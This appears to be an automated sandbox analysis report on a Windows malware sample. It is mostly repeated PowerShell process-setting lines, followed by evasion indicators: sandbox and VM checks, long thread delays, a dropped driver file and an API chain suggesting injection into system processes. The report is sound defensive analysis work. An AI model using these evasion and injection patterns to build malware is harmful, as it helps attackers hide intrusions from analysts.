        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Contains functionality to compare user and computer (likely to detect sandboxes)
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,11_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,39_2_00000001400010C0
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5343Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4435Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5546Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4453Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9872Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7372
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2097
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9875Jump to behavior
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1719Jump to behavior
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 389Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeDropped PE file which has not been started: C:\Windows\Temp\gyqerfjfsbie.sysJump to dropped file
        Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_26-14886
        Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_29-14869
        Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-480
        Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.8 %
        Source: C:\Windows\System32\lsass.exeAPI coverage: 7.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.8 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep count: 5343 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep count: 4435 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 6824Thread sleep count: 36 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7364Thread sleep count: 5546 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7364Thread sleep time: -5546000s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7364Thread sleep count: 4453 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7364Thread sleep time: -4453000s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7492Thread sleep count: 9872 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7492Thread sleep time: -9872000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 7372 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 2097 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7508Thread sleep count: 242 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7508Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 7880Thread sleep count: 9875 > 30Jump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 7880Thread sleep time: -9875000s >= -30000sJump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 7652Thread sleep count: 1719 > 30Jump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 7652Thread sleep time: -171900s >= -30000sJump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 7856Thread sleep count: 389 > 30Jump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 7856Thread sleep time: -38900s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7904Thread sleep count: 250 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7904Thread sleep time: -250000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7928Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7928Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8008Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8008Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8092Thread sleep count: 209 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8092Thread sleep time: -209000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8100Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8100Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8156Thread sleep count: 239 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8156Thread sleep time: -239000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8176Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8176Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5544Thread sleep count: 249 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5544Thread sleep time: -249000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2448Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2448Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3004Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3004Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7172Thread sleep count: 241 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7172Thread sleep time: -241000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7176Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7176Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC64DCE0 FindFirstFileExW,20_2_00000225DC64DCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6ADCE0 FindFirstFileExW,20_2_00000225DC6ADCE0
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE0 FindFirstFileExW,26_2_00000202C0AEDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE0 FindFirstFileExW,29_2_000002A66130DCE0
